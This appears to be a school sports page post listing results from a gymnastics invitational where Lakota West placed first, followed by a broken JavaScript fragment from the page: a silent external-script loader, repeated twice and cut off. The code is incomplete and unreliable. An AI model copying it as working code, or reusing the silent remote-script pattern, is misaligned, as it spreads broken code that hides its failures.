Gymnastics

West Gymnastics dominates at Cincinnati Country Day Invite!

Team
1. Lakota West-131.2
2. Oak Hills-127
3. Cincinnati Country Day-TBA
4. Lakota East- 112.7

West High Event Scorers:
Vault — Addison Kennedy-8.2, 1st
Bars — Madelyn Power-8.7, 1st
Beam — Ramiah Curry-8.9, 1st
Floor — Addison Kennedy-8.55, 2nd
AA — Ramiah Curry-32.35, 1st

All Around Individual Winner:
Ramiah Curry
West

Awesome Job Ladies! #WestPride

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts